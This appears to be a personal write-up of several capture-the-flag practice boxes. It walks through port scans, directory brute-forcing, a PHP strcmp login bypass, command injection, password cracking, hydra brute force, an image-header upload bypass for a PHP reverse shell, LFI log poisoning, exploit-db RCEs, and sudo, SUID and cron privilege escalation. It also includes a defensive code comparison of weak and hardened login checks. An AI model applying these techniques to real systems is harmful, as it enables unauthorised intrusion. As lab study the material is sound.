Then I spent 2 or 3 hours on SUID privilege escalation, trying every method. `uname -r` turned up a kernel version with a matching privilege-escalation CVE, but there is no gcc on the box, so I compiled locally and served it over a web server; the box's environment didn't support the binary and it errored out. After trying all sorts of GitHub exploits without success, and researching for far too long, I peeked at how someone else did it and found that `bash -p` escalates successfully.

![image](https://hackmd.io/_uploads/S1BOC6FFC.png)

# Potato

Scan the common ports first.

![image](https://hackmd.io/_uploads/HyGwT8OtR.png)

Port 80 is open, so start with the web. The page is just a single potato.

![image](https://hackmd.io/_uploads/S11-AL_FA.png)

Enumerating URIs with dirb finds /admin.

![image](https://hackmd.io/_uploads/BJk-JPutA.png)

SQL injection got nowhere, so keep scanning: /admin/logs/ shows there is a user admin.

![image](https://hackmd.io/_uploads/r1k1ZD_YA.png)

Out of ideas, I did a full port scan and found port 2112 open; a closer look shows it is FTP and allows anonymous login.

![image](https://hackmd.io/_uploads/H10dMv_FC.png)

`cat index.php.bak` gives the site code:

```php
<?php
$pass = "potato"; //note Change this password regularly

if ($_GET['login'] === "1") {
    if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) {
        echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
        setcookie('pass', $pass, time() + 365*24*3600);
    } else {
        echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
    }
    exit();
}
?>
```

But admin/potato wouldn't log in...
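The login check in the recovered `index.php.bak` compares untrusted input with `strcmp(...) == 0`. Below is an added example (my own code, not the box's): it places that weak check beside a hardened version that rejects non-string input and uses `hash_equals()` with a stored password hash. The function names and the test cases are mine.

```php
<?php
// Added example, not code from the Potato box. It contrasts the weak login
// check from index.php.bak with a hardened version.
//
// Why the original is weak: strcmp() returns an int for two strings, but on
// PHP 7 a non-string argument (for instance an array submitted as a
// `username[]` form field) only raises a warning and makes strcmp() return
// NULL. The loose comparison `NULL == 0` is true, so both halves of the
// original condition can pass without the password. On PHP 8 the same call
// throws a TypeError instead, which aborts the script rather than logging in.

$pass = "potato"; // the plaintext constant from the box's index.php.bak

// Weak check, reproducing the logic of index.php.bak (kept for comparison).
function weak_login($username, $password, string $pass): bool
{
    return strcmp($username, "admin") == 0 && strcmp($password, $pass) == 0;
}

// Hardened check:
//  - accept only strings, so array/null/int input is rejected up front;
//  - use hash_equals(), which requires strings and compares in constant time;
//  - verify against a stored password hash rather than a plaintext constant.
function safe_login($username, $password, string $passHash): bool
{
    if (!is_string($username) || !is_string($password)) {
        return false;
    }
    return hash_equals("admin", $username) && password_verify($password, $passHash);
}

// Constructed inputs for a local run (`php this_file.php`).
$passHash = password_hash($pass, PASSWORD_DEFAULT);

$cases = [
    "correct creds"      => ["admin", "potato"],
    "wrong password"     => ["admin", "wrong"],
    "non-string (array)" => [[], []],
];

foreach ($cases as $label => [$u, $p]) {
    try {
        $weak = @weak_login($u, $p, $pass); // @ silences the PHP 7 warning
    } catch (TypeError $e) {
        $weak = "TypeError"; // PHP 8 refuses the non-string call outright
    }
    $safe = safe_login($u, $p, $passHash);
    printf("%-20s weak=%s safe=%s\n", $label, var_export($weak, true), var_export($safe, true));
}
```

The original also stores the plaintext password in a cookie on success; a session identifier belongs there instead.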
I looked up the PHP strcmp bypass ([see this article](https://www.doyler.net/security-not-included/bypassing-php-strcmp-abctf2016)).

![image](https://hackmd.io/_uploads/SJNJ8wuY0.png)

After logging in, the logs page looks injectable for command injection with Burp Suite.

![image](https://hackmd.io/_uploads/SknmLv_YA.png)

A few injection attempts later, the user flag is ours.

![image](https://hackmd.io/_uploads/rJSNvvdKA.png)

Then `cat /etc/passwd` gives webadmin's password hash.

![image](https://hackmd.io/_uploads/B10ruPdYR.png)

I took it to john, but my john died on me, so hashcat found the password instead: dragon.

![image](https://hackmd.io/_uploads/H1gD1duFA.png)

Then `sudo -l` to see what can be used: there is this thing, `/bin/nice /notes/*`. Drag it over to `/bin/sh` and OK, get root.

![image](https://hackmd.io/_uploads/ry9efddY0.png)

# FunboxEasy

Port scan result:

![image](https://hackmd.io/_uploads/H1QvROOFC.png)

dirb finds `/store/`; the site is a bookstore with a known RCE. Don't ask how I know (I've hit it before).

![image](https://hackmd.io/_uploads/HyG-1Y_KR.png)

Grab the payload from [exploit db](https://www.exploit-db.com/exploits/47887) and it gets in. After taking the user flag I also collected the password for SSH.

![image](https://hackmd.io/_uploads/B1kvZKuFC.png)

Finally `sudo -l`: the first entry failed, so based on experience I picked another one to try, and got root.

![image](https://hackmd.io/_uploads/By1qGtdtR.png)

# Moneybox

:::info
How to put it, this one is very CTF-like; I have done something similar before.
:::

Port scan result: 21, 22 and 80 open. FTP allows anonymous login and contains only one image. `steghide extract -sf trytofind.jpg` asks for a password. dirb finds /blog, and from there it is just F12 all the way (the kind of thing anyone with hands can do). That gives the key; extracting with it yields data.txt as below:

![image](https://hackmd.io/_uploads/S1W5ox9YR.png)

It mentions the name renu and says the password is too weak, and there was nothing else to attack, so brute-force it with hydra. After logging in I looked around and tried all sorts of privilege escalation without finding anything usable. Then I found an authorized_keys file and, not knowing what it was for, asked ChatGPT:

```
The authorized_keys file lives in the .ssh directory and stores the public keys that are allowed to log in over SSH. When you try to connect to the server over SSH, the server checks whether the private key you present corresponds to a public key in authorized_keys; if it matches, you are allowed in.
```

SSH in as the other user, check SUID (nothing), then `sudo -l` shows something usable, and that gets root.

![image](https://hackmd.io/_uploads/Byxz7f9tR.png)

# Gaara

A full port scan shows only 22 and 80. The site is a single image with nothing else. dirb finds nothing useful; with `/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt` it is almost at the end of the wordlist before there is a hit: `/Cryoserver`, which opens as a blank page.

![image](https://hackmd.io/_uploads/S1hloyFtR.png)

At first I took it for a dead page and kept brute-forcing, but the wordlist above turned up nothing. Coming back to this page and looking more carefully, there is something at the very bottom......

![image](https://hackmd.io/_uploads/S11U2kttC.png)

Then into one of the directories:

![image](https://hackmd.io/_uploads/HJn-pktYA.png)

In short, that gives the name Gaara, and hydra brute-forces the SSH login.

![image](https://hackmd.io/_uploads/Bky3A1tF0.png)

The user flag follows directly. For the root flag, look for SUID binaries first, then gtfobins shows gdb can be used.

![image](https://hackmd.io/_uploads/HJ3SGxKFA.png)

# Blogger

Port scan result:

```bash
┌─[root@G]─[/home/parrot]
└──╼ #nmap -sS -Pn -sC 192.168.165.217 --top-ports=20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 14:02 CST
Nmap scan report for blogger.pg (192.168.165.217)
Host is up (0.071s latency).

PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
| ssh-hostkey:
|   2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
|   256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)
|_  256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed domain
80/tcp   open   http
|_http-title: Blogger | Home
110/tcp  closed pop3
111/tcp  closed rpcbind
135/tcp  closed msrpc
139/tcp  closed netbios-ssn
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed microsoft-ds
993/tcp  closed imaps
995/tcp  closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
```

Ports 22 and 80 are open. The website has nothing of substance, all front end.

![image](https://hackmd.io/_uploads/r1okLs_KA.png)

dirb finds `/assets/`, which has directory listing enabled. Browsing around leads to `assets/fonts/blog/`; any post in there has an upload form at the bottom. Uploading a php_reverse_shell renamed with an image extension is still filtered, so I changed the file content to start with `GIF89a`; that uploads successfully. After getting RCE, run `python3 -c 'import pty; pty.spawn("/bin/bash")'` **(it has to be /bin/bash here to get full terminal features; /bin/sh won't do)** so the shell is usable.

![image](https://hackmd.io/_uploads/rybMqidYR.png)

![image](https://hackmd.io/_uploads/SkVQooutR.png)

Many privilege escalation methods failed, so I started by switching to normal users; switching to vagrant with the password vagrant finally worked, and as vagrant `sudo su` gives root.

![image](https://hackmd.io/_uploads/S108f3dYA.png)

# CyberSploit1

Ports 80 and 22 are open. F12 on the web page shows a comment at the bottom containing the username; then decode the base64 from robots.txt.

![image](https://hackmd.io/_uploads/H1TZdZI5A.png)

```bash
┌──(kali㉿G)-[~]
└─$ echo "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=" | base64 -d
cybersploit{youtube.com/c/cybersploit}
```

That gives a flag. Brute-forcing SSH with rockyou didn't work, but using this flag as the password logs in.

![image](https://hackmd.io/_uploads/SyUJYZL9C.png)

Then the Linux kernel version is exploitable: `uname -r` gives 3.13.0, and searchsploit finds a usable payload.

![image](https://hackmd.io/_uploads/rJggs-Uq0.png)

# Ha-natraj

:::info
Recommended box; I learned something useful here.
:::

Ports 22 and 80 are open. The website offers no entry point. Directory brute-forcing finds `/console`, which contains file.php; fuzzing shows a `?file=` parameter that is an LFI. Web log to RCE failed, but poisoning the SSH log on port 22 instead gave RCE.

![image](https://hackmd.io/_uploads/HkzENVL9R.png)

![image](https://hackmd.io/_uploads/SkcknELq0.png)

Privilege escalation here has two stages. After checking the usual places, `sudo -l` shows apache2 can be used; check the apache2 config files. (Shelving this for now, root still not cracked.)

# Sar

Ports 22 and 80 are open. The site has nothing at first; directory brute-forcing finds `sar2HTML` in robots.txt. Looking at it, the site shows version information, and exploit db has an RCE for it. I used this [exploit](https://www.exploit-db.com/exploits/49344); after RCE, start a web server on the attacking side and have the victim download a php reverse shell.

![image](https://hackmd.io/_uploads/rJMrFBwqA.png)

![image](https://hackmd.io/_uploads/BJq-qHv9R.png)

Finally use the crontab. Simply adding a line `/bin/bash -i` didn't work, so I reused the existing php reverse shell and caught a second shell.

![image](https://hackmd.io/_uploads/rJS34UPq0.png)

# SunsetNoontide

```bash
┌──(root㉿G)-[/tmp]
└─# nmap 192.168.151.120 -Pn -sS -T5 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 22:51 CST
Warning: 192.168.151.120 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.151.120
Host is up (0.084s latency).
Not shown: 65034 closed tcp ports (reset), 498 filtered tcp ports (no-response)
PORT     STATE SERVICE
6667/tcp open  irc
6697/tcp open  ircs-u
8067/tcp open  infi-async

Nmap done: 1 IP address (1 host up) scanned in 718.43 seconds
```

This box is unusual; after some research it turns out to be a backdoor